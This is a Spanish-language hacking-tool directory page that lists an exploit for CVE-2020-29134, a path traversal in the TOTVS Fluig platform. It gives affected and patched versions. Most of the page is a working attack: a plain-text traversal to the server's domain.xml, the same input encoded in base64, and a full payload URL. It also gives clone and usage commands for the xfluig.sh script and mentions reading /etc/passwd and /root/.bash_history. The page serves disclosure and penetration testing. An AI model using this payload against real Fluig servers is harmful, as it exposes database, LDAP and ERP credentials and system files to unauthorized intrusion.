Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2020-29134 — Exploit CVE-2020-29134 - TOTVS Fluig Platform - Path Traversal | Kitploit
Herramientas/GitHubGitHub/ls4ss/cve-2020-29134
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de Penetración
GitHubls4ss/cve-2020-29134

CVE-2020-29134

Exploit CVE-2020-29134 - TOTVS Fluig Platform - Path Traversal

Ver Repositorio
31hace 3 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Plataforma Totvs Fluig

root@kitploit:~
 Fluig es la plataforma de productividad y colaboración que se integra con el sistema ERP,
 y con los demás sistemas de tu empresa para revolucionar la forma en que tú y tu equipo trabajan.

CVE-2020-29134

root@kitploit:~
 La plataforma TOTVS Fluig permite path traversal a través de un parámetro codificado en base64.
 Cuando se explota, esta vulnerabilidad permite la lectura de archivos XML sensibles, que contienen
 datos para acceder a la base de datos y, en algunos casos, conexiones LDAP e integraciones con el sistema ERP.
 Además, también es posible explorar archivos del sistema, como /etc/passwd y /root/.bash_history
 

Versiones afectadas

root@kitploit:~
--
<== Fluig Lake 1.7.0
<== Fluig 1.6.5
<== Fluig 1.6.4
...

Versiones parcheadas

root@kitploit:~
<== Fluig Lake 1.7.0-210303 (Parcheado)
<== Fluig 1.6.5-210308 (Parcheado)
<== Fluig 1.6.4-210308 (Parcheado)

Construyendo el Payload

alt text

Vector de ataque

root@kitploit:~
 http://fluig.host.com/volume/stream/Rmx1aWc=/

Path traversal en texto plano

root@kitploit:~
 ?t=1&vol=Default&id=1&ver=1000&file=../../../../../../../../../../../../../fluig/appserver/domain/configuration/domain.xml

Path traversal codificado en base64

root@kitploit:~
 P3Q9MSZ2b2w9RGVmYXVsdCZpZD0xJnZlcj0xMDAwJmZpbGU9Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZmx1aWcvYXBwc2VydmVyL2RvbWFpbi9jb25maWd1cmF0aW9uL2RvbWFpbi54bWw=

Payload

root@kitploit:~
 http://HOST.FLUIG.COM/volume/stream/Rmx1aWc=/P3Q9MSZ2b2w9RGVmYXVsdCZpZD0xJnZlcj0xMDAwJmZpbGU9Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZmx1aWcvYXBwc2VydmVyL2RvbWFpbi9jb25maWd1cmF0aW9uL2RvbWFpbi54bWw=
 

Referencia de Exploit-DB

root@kitploit:~
 https://www.exploit-db.com/exploits/49622

 

Clonar Repositorio

root@kitploit:~
 # git clone https://github.com/lucxssouza/CVE-2020-29134.git
 # cd CVE-2020-29134
 # chmod +x xfluig.sh

Uso

root@kitploit:~
 Ej1: ./xfluig.sh http://fluig.host.com REQUESTS_WFUZZ (número de solicitudes generadas por wfuzz)

 Ej2: ./xfluig.sh http://fluig.host.com:PORT
Descargar herramienta